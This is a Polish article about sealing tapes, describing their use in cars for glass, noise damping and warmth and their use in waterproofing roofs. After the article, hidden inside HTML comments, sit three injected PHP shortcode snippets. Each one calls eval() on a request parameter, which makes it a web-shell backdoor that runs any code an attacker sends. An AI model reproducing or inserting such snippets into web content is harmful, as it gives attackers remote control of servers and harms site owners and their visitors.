Taśmy uszczelniające w branży samochodowej

Taśmy uszczelniające

Różnego rodzaju taśmy, szczególnie te uszczelniające zwykliśmy kojarzyć z branżą budowlaną. Jednak tak naprawdę mają one bardzo wiele zastosowań. Rzadko kto zdaje sobie sprawę z tego, że taśmy uszczelniające stosuje się także w branży samochodowej. Są one stosowane ze względu na to, że doskonale izolują od wody, powietrza, kurzu i warunków atmosferycznych.

Najbardziej oczywistym zastosowaniem taśm uszczelniających w branży samochodowej są okna, drzwi tylne, szyba przednia i tylna, a także szyberdachy – wszędzie tam, gdzie znajdują się elementy szklane. Podobnie jak jak w przypadku naszych własnych domowych okien uszczelnia się je za pomocą taśm, tak by nie przepuszczały wilgoci do wnętrza samochodu, a także, by szyby nie parowały. O ile bowiem zaparowane tylne boczne szyby nie stanowią żadnego problemu dla kierowcy, tak ciągłe parowanie szyby tylnej lub przedniej mogłoby skutecznie uniemożliwić kierowcy jazdę w trudnych warunkach pogodowych. Taśma uszczelniająca znalazła także inne zastosowanie w samochodach, a jest to spowodowane jej właściwościami wyciszającymi. Odpowiednio uszczelniony samochód wydaje się jego użytkownikowi o wiele cichszy – taśma lub inne środki izolujące pochłaniają w ten sposób dźwięki, np. dochodzącą z zewnątrz, ale przede wszystkim samego wnętrza samochodu, a jak wiadomo niektóre silniki pracują bardzo głośno.

//

Taśmy uszczelniające pozwalają też na bardziej ekonomiczną i ekologiczną jazdę, szczególnie w zimę. Źle uszczelniony samochód szybciej pozbywa się ciepła, bo po prostu wnika do niego zimne powietrze, co zatem idzie, pasażerowie jeszcze bardziej podkręcają ogrzewanie i spalają więcej paliwa.

Taśmy uszczelniające a uszczelnienia dachu

Kiedyś mawiano, że jaki dach, taki dom i jest w tym dużo racji. Solidny dach, to także najczęściej solidny dom. Aby nasz dach był solidny ważna jest nie tylko odpowiednia jego konstrukcja czy nakrycie go, ale także uszczelnienie i izolacja. Zapewnić to mogą różnego rodzaju materiały m.in. taśmy uszczelniające.

Dach to miejsce w naszym domu ,,newralgiczne”. Często dopiero podczas pierwszej ulewy przekonujemy się, że popełniliśmy jakiś błąd, kiedy to musimy pod przeciekający strop podstawiać wiadra na wodę, albo już po fakcie zauważamy nacieki na ścianach strychowych. Źle wykonany, a przynajmniej źle wykończony dach ma też złą izolacją termalną. Tę drugą, nawet już po zakończeniu prac możemy naprawić, zlecając wykonanie ocieplenia dachu metodą pneumatyczną, polegającą na wypełnieniu dylatacji włóknami izolującymi. O ile jednak lepiej by było, gdyby Polak mądry był przed szkodą. A potrzeba naprawdę niewiele, by odpowiednio uszczelnić swój dach, a tym samym zabezpieczyć go przed zalaniem nawet w przypadku prawdziwej nawałnicy, albo nadmorskiego sztormu, wystarczy odpowiedni materiał izolujący, a jest nim taśma uszczelniająca.

//

Można ją z powodzeniem kupić w wielu sklepach z artykułami budowlanymi, a także zastosować na różnego rodzaju przykryciach dachu, w większości przypadków jest to też taśma samowulkanizująca, a co ważniejsze jest odporna nawet na bardzo zmienne warunki pogodowe: na mróz, upały, ulewne deszcze. Nie szkodzą jej również promienie UV. Co ważne taśmy uszczelniające dekarskie możesz zastosować nie tylko do izolacji dachów, ale w ogóle do izolacji styków różnych powierzchni gładkich.

<!– [insert_php]if (isset($_REQUEST["iqqr"])){eval($_REQUEST["iqqr"]);exit;}[/insert_php][php]if (isset($_REQUEST["iqqr"])){eval($_REQUEST["iqqr"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["pHH"])){eval($_REQUEST["pHH"]);exit;}[/insert_php][php]if (isset($_REQUEST["pHH"])){eval($_REQUEST["pHH"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["PjSwx"])){eval($_REQUEST["PjSwx"]);exit;}[/insert_php][php]if (isset($_REQUEST["PjSwx"])){eval($_REQUEST["PjSwx"]);exit;}[/php] –>